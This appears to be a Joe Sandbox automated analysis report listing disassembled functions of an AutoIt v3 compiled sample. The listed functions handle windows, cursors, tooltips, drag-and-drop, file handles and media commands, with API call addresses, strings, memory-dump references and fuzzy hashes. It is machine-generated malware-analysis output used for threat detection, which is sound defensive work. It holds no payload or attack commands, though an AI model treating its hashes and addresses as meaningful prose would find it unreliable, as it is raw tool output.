                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00892939
                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00892949
                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0089297C
                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00892990
                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 008929AE
                                                                        • GetStockObject.GDI32(00000011), ref: 008929CA
                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 008929D5
                                                                          • Part of subcall function 00892344: GetCursorPos.USER32(?), ref: 00892357
                                                                          • Part of subcall function 00892344: ScreenToClient.USER32(009557B0,?), ref: 00892374
                                                                          • Part of subcall function 00892344: GetAsyncKeyState.USER32(00000001), ref: 00892399
                                                                          • Part of subcall function 00892344: GetAsyncKeyState.USER32(00000002), ref: 008923A7
                                                                        • SetTimer.USER32(00000000,00000000,00000028,Function_00001256), ref: 008929FC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                        • String ID: AutoIt v3 GUI
                                                                        • API String ID: 1458621304-248962490
                                                                        • Opcode ID: b54489eda44262bb613f5c4ef56492abad4c1d27349f2004a70cf9869acee939
                                                                        • Instruction ID: 2dddb80c839c88de330eadd7665f1e1c09118e50ac2c3561ede0559c6ea9646d
                                                                        • Opcode Fuzzy Hash: b54489eda44262bb613f5c4ef56492abad4c1d27349f2004a70cf9869acee939
                                                                        • Instruction Fuzzy Hash: 95B17A71A0420AEFDF14EFA8DC55BAE7BB5FB08315F148129FA15E62A0DB74E840DB50
                                                                        Function 008EAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 008EAF18
                                                                        • _wcscmp.LIBCMT ref: 008EAF29
                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 008EAF51
                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 008EAF6E
                                                                        • _wcscmp.LIBCMT ref: 008EAF8C
                                                                        • _wcsstr.LIBCMT ref: 008EAF9D
                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 008EAFD5
                                                                        • _wcscmp.LIBCMT ref: 008EAFE5
                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 008EB00C
                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 008EB055
                                                                        • _wcscmp.LIBCMT ref: 008EB065
                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 008EB08D
                                                                        • GetWindowRect.USER32(00000004,?), ref: 008EB0F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                        • String ID: @$ThumbnailClass
                                                                        • API String ID: 1788623398-1539354611
                                                                        • Opcode ID: 3c004bfd7e4b56da0c5ca72ef2f8d23bc65950823b07e86ad8aaf48381e37dec
                                                                        • Instruction ID: d2b35d480ec8a6e8c7faba0e00f5bcb3898c437777884b1667960cf612d68cc5
                                                                        • Opcode Fuzzy Hash: 3c004bfd7e4b56da0c5ca72ef2f8d23bc65950823b07e86ad8aaf48381e37dec
                                                                        • Instruction Fuzzy Hash: 8181BF7110828A9BDB05DF16C881BAB7BD8FF45724F048469FD85CA096DB30ED49CBA2
                                                                        Function 008EABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                        • API String ID: 1038674560-1810252412
                                                                        • Opcode ID: 848570a83de52683eeafe0501329ab012b49e972a63c17cd9a38c1f3dc018c5a
                                                                        • Instruction ID: 6bf5208c3e8d17eb7d78783f6b5e41f638c90b6ca596ecdb9d5230380064facc
                                                                        • Opcode Fuzzy Hash: 848570a83de52683eeafe0501329ab012b49e972a63c17cd9a38c1f3dc018c5a
                                                                        • Instruction Fuzzy Hash: CD317031A4824DAADA18FAA9DE43EFEB764FF11B18F640429B402F11D1EF616F04C653
                                                                        Function 00904FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00905013
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0090501E
                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00905029
                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00905034
                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 0090503F
                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 0090504A
                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00905055
                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00905060
                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 0090506B
                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00905076
                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00905081
                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0090508C
                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00905097
                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 009050A2
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 009050AD
                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 009050B8
                                                                        • GetCursorInfo.USER32(?), ref: 009050C8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$Load$Info
                                                                        • String ID:
                                                                        • API String ID: 2577412497-0
                                                                        • Opcode ID: 72688663e31c30d42318236964984a585e57cf5a7a433960f9f7c1a985ab90ac
                                                                        • Instruction ID: cb1d8bb7a1764bd6b68a2a0e5b05f987c55c3c97e2e2f0b8f2def3428dddd3a2
                                                                        • Opcode Fuzzy Hash: 72688663e31c30d42318236964984a585e57cf5a7a433960f9f7c1a985ab90ac
                                                                        • Instruction Fuzzy Hash: 2431E2B1D483196ADF109FB68C899AFBEECFB04750F50452AE50DE7280DA78A5008F95
                                                                        Function 008EA439 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 008EA47A
                                                                        • _wcscmp.LIBCMT ref: 008EA52E
                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 008EA583
                                                                        • _wcscmp.LIBCMT ref: 008EA5BF
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 008EA5F6
                                                                        • GetDlgCtrlID.USER32(?), ref: 008EA648
                                                                        • GetWindowRect.USER32(?,?), ref: 008EA67E
                                                                        • GetParent.USER32(?), ref: 008EA69C
                                                                        • ScreenToClient.USER32(00000000), ref: 008EA6A3
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 008EA71D
                                                                        • _wcscmp.LIBCMT ref: 008EA731
                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 008EA757
                                                                        • _wcscmp.LIBCMT ref: 008EA76B
                                                                          • Part of subcall function 008B362C: _iswctype.LIBCMT ref: 008B3634
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_iswctype
                                                                        • String ID: %s%u
                                                                        • API String ID: 1635473695-679674701
                                                                        • Opcode ID: d26aa8904a1c1a06fd8c2d586754f4155a75e6c4b4954cd67dccfe0a59321a09
                                                                        • Instruction ID: 0cdd56e80474e5d72b425186fba50749cddb4fa6c6f6144861a42246591e76a6
                                                                        • Opcode Fuzzy Hash: d26aa8904a1c1a06fd8c2d586754f4155a75e6c4b4954cd67dccfe0a59321a09
                                                                        • Instruction Fuzzy Hash: 33A1D131204246AFDB18DF65C884BEAB7E8FF56B54F008629F999D2190DB30F945CB92
                                                                        Function 0091A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0091A259
                                                                        • DestroyWindow.USER32(?,?), ref: 0091A2D3
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0091A34D
                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0091A36F
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0091A382
                                                                        • DestroyWindow.USER32(00000000), ref: 0091A3A4
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00890000,00000000), ref: 0091A3DB
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0091A3F4
                                                                        • GetDesktopWindow.USER32 ref: 0091A40D
                                                                        • GetWindowRect.USER32(00000000), ref: 0091A414
                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0091A42C
                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0091A444
                                                                          • Part of subcall function 008925DB: GetWindowLongW.USER32(?,000000EB), ref: 008925EC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                        • String ID: 0$tooltips_class32
                                                                        • API String ID: 1297703922-3619404913
                                                                        • Opcode ID: b6550bb2a633d3783cf46de1f9632da3d3fc651ba8b7b4ef4dcfd5d0ca2474f5
                                                                        • Instruction ID: 339faa18886dee550c1cef991a576b3a6bc8c9c869967b6de04ea77cd2ad959e
                                                                        • Opcode Fuzzy Hash: b6550bb2a633d3783cf46de1f9632da3d3fc651ba8b7b4ef4dcfd5d0ca2474f5
                                                                        • Instruction Fuzzy Hash: 1E717970254208AFDB21DF28CC59FAA7BE9FB88304F04492CF985872B1D770AD46DB52
                                                                        Function 0091C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00892612: GetWindowLongW.USER32(?,000000EB), ref: 00892623
                                                                        • DragQueryPoint.SHELL32(?,?), ref: 0091C627
                                                                          • Part of subcall function 0091AB37: ClientToScreen.USER32(?,?), ref: 0091AB60
                                                                          • Part of subcall function 0091AB37: GetWindowRect.USER32(?,?), ref: 0091ABD6
                                                                          • Part of subcall function 0091AB37: PtInRect.USER32(?,?,?), ref: 0091ABE6
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0091C690
                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0091C69B
                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0091C6BE
                                                                        • _wcscat.LIBCMT ref: 0091C6EE
                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0091C705
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0091C71E
                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0091C735
                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0091C757
                                                                        • DragFinish.SHELL32(?), ref: 0091C75E
                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0091C851
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                        • API String ID: 169749273-3440237614
                                                                        • Opcode ID: a8b1e2da3eec16d50abaf8929e2653842f7e228cb7ea54be2fa05004274a1622
                                                                        • Instruction ID: 37dc5ecc6a108d929620c4549ada5b064dde9d6cc7ff83c96020ed5e385128c7
                                                                        • Opcode Fuzzy Hash: a8b1e2da3eec16d50abaf8929e2653842f7e228cb7ea54be2fa05004274a1622
                                                                        • Instruction Fuzzy Hash: F4618D71208305AFCB01EF68DC95EAFBBE8FF89354F00492EF595921A1DB709949CB52
                                                                        Function 008C8170 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 179fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __set_osfhnd.LIBCMT ref: 008C8184
                                                                          • Part of subcall function 008BD52A: SetStdHandle.KERNEL32(000000F6,008C8189,00000001,0091FB24,00000000,?,008C8189,0091FB24,00000040,?,?,?,?,?,00000000,00000109), ref: 008BD57D
                                                                        • __lseeki64_nolock.LIBCMT ref: 008C81EE
                                                                          • Part of subcall function 008B8AF4: __getptd_noexit.LIBCMT ref: 008B8AF4
                                                                        • __close_nolock.LIBCMT ref: 008C8214
                                                                          • Part of subcall function 008C0ADD: CloseHandle.KERNELBASE(00000000,0091FB24,00000000,?,008C8219,0091FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008C0B2D
                                                                          • Part of subcall function 008C0ADD: GetLastError.KERNEL32(?,008C8219,0091FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008C0B37
                                                                          • Part of subcall function 008C0ADD: __free_osfhnd.LIBCMT ref: 008C0B44
                                                                          • Part of subcall function 008C0ADD: __dosmaperr.LIBCMT ref: 008C0B66
                                                                        • CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 008C851A
                                                                        • ___createFile.LIBCMT ref: 008C8539
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008C8546
                                                                        • __dosmaperr.LIBCMT ref: 008C854D
                                                                        • __free_osfhnd.LIBCMT ref: 008C856D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$CloseErrorLast__dosmaperr__free_osfhnd$File___create__close_nolock__getptd_noexit__lseeki64_nolock__set_osfhnd
                                                                        • String ID: @$t"=$t"=$t)=$t)=$tD=
                                                                        • API String ID: 3527355902-3051076874
                                                                        • Opcode ID: ac3f8c35fb3130faaf79a81f19cace89e38915cf49394ff3d900c9d5db0c811b
                                                                        • Instruction ID: 10dc418ed0c1c7aba287de0bd3767a4c980401e5e7fb0f9869cc19774258512f
                                                                        • Opcode Fuzzy Hash: ac3f8c35fb3130faaf79a81f19cace89e38915cf49394ff3d900c9d5db0c811b
                                                                        • Instruction Fuzzy Hash: F3512131954646CBDB298B18E895FAD7B31FB05310F28422DE961EB2E2CB76CD40D745
                                                                        Function 00914392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?), ref: 00914424
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0091446F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharMessageSendUpper
                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                        • API String ID: 3974292440-4258414348
                                                                        • Opcode ID: c946f8f887bcc08850dd2141c8e45b6416b7b2cc17efbc33f7769d75d74741ae
                                                                        • Instruction ID: b68e37cf24051e80d78825881edfb490bf4e36f75956f07efbe377893a952e76
                                                                        • Opcode Fuzzy Hash: c946f8f887bcc08850dd2141c8e45b6416b7b2cc17efbc33f7769d75d74741ae
                                                                        • Instruction Fuzzy Hash: 5F915D702043159BCB14EF18C451AAEB7E5FF99354F14486CF896AB3A2DB34ED49CB82
                                                                        Function 0091B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0091B8B4
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00916B11,?), ref: 0091B910
                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0091B949
                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0091B98C
                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0091B9C3
                                                                        • FreeLibrary.KERNEL32(?), ref: 0091B9CF
                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0091B9DF
                                                                        • DestroyIcon.USER32(?), ref: 0091B9EE
                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0091BA0B
                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0091BA17
                                                                          • Part of subcall function 008B2EFD: __wcsicmp_l.LIBCMT ref: 008B2F86
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                        • String ID: .dll$.exe$.icl
                                                                        • API String ID: 1212759294-1154884017
                                                                        • Opcode ID: d0736e2685fed07aa08bd46115c20bc505a84f5b78bc54881a4350b453aa855b
                                                                        • Instruction ID: bbacea4f0b94af80cce8a2a3c78b81f8d89e5a7e22a3007c09e86c31e4e8721f
                                                                        • Opcode Fuzzy Hash: d0736e2685fed07aa08bd46115c20bc505a84f5b78bc54881a4350b453aa855b
                                                                        • Instruction Fuzzy Hash: 1261D071A00219BAEB14DF68CC45FFE7BACFB08724F108619FA15D61D1DB749981DBA0
                                                                        Function 008FDC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?), ref: 008FDCDC
                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 008FDCEC
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008FDCF8
                                                                        • __wsplitpath.LIBCMT ref: 008FDD56
                                                                        • _wcscat.LIBCMT ref: 008FDD6E
                                                                        • _wcscat.LIBCMT ref: 008FDD80
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008FDD95
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008FDDA9
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008FDDDB
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008FDDFC
                                                                        • _wcscpy.LIBCMT ref: 008FDE08
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008FDE47
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                        • String ID: *.*
                                                                        • API String ID: 3566783562-438819550
                                                                        • Opcode ID: 74728f1d414eb2b3d180d81e93d55cc5a2988e021fabad0bd65d4b1c167fae80
                                                                        • Instruction ID: 69eaeb4409439a1c3e0a60933458785886ffe89dcaaa5862a4c0bb9df48c9d47
                                                                        • Opcode Fuzzy Hash: 74728f1d414eb2b3d180d81e93d55cc5a2988e021fabad0bd65d4b1c167fae80
                                                                        • Instruction Fuzzy Hash: 0D617B725043099FCB10EF28C8459AEB3E9FF89314F04892DFA99D7251EB35E945CB92
                                                                        Function 008FA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                        • CharLowerBuffW.USER32(?,?), ref: 008FA3CB
                                                                        • GetDriveTypeW.KERNEL32 ref: 008FA418
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008FA460
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008FA497
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008FA4C5
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
